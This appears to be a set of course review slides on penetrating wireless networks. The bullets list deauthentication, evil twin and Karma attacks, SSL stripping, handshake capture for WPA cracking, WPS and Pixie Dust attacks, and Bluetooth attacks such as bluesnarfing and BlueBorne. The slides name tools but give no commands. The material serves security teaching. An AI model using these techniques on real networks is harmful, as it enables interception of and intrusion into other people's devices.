• Check the laws in your area before using radio jamming devices

Penetrating Wireless Networks Review (cont’d)

• Use a tool like aireplay-ng to knock clients off a WAP
• Spoof MAC addresses in deauthentication attacks
• Use evil twins to entice users to connect to your rogue AP
• Use Karma attacks: answer clients' probe requests for their saved networks to trick them into connecting to the evil twin
• Use SSL strip with an evil twin to downgrade a user's HTTPS session (unless HSTS protects the site)
• Place your wireless interface in monitor mode to receive all 802.11 frames on the channel
• Use airodump-ng to sniff the four-way handshake for WPA/WPA2 key cracking

Penetrating Wireless Networks Review (cont’d)

• Use online brute forcing to crack a WPS PIN
• Use the Pixie Dust attack to conduct offline cracking of vulnerable APs
• Use bluejacking to send unsolicited messages to discoverable Bluetooth devices
• Use bluesnarfing to read sensitive information from discoverable Bluetooth devices
• Use bluebugging to gain system access to a Bluetooth-enabled device
• Use BlueBorne to gain access to a Bluetooth-enabled device without involving the victim

Lab 14: Hacking Wireless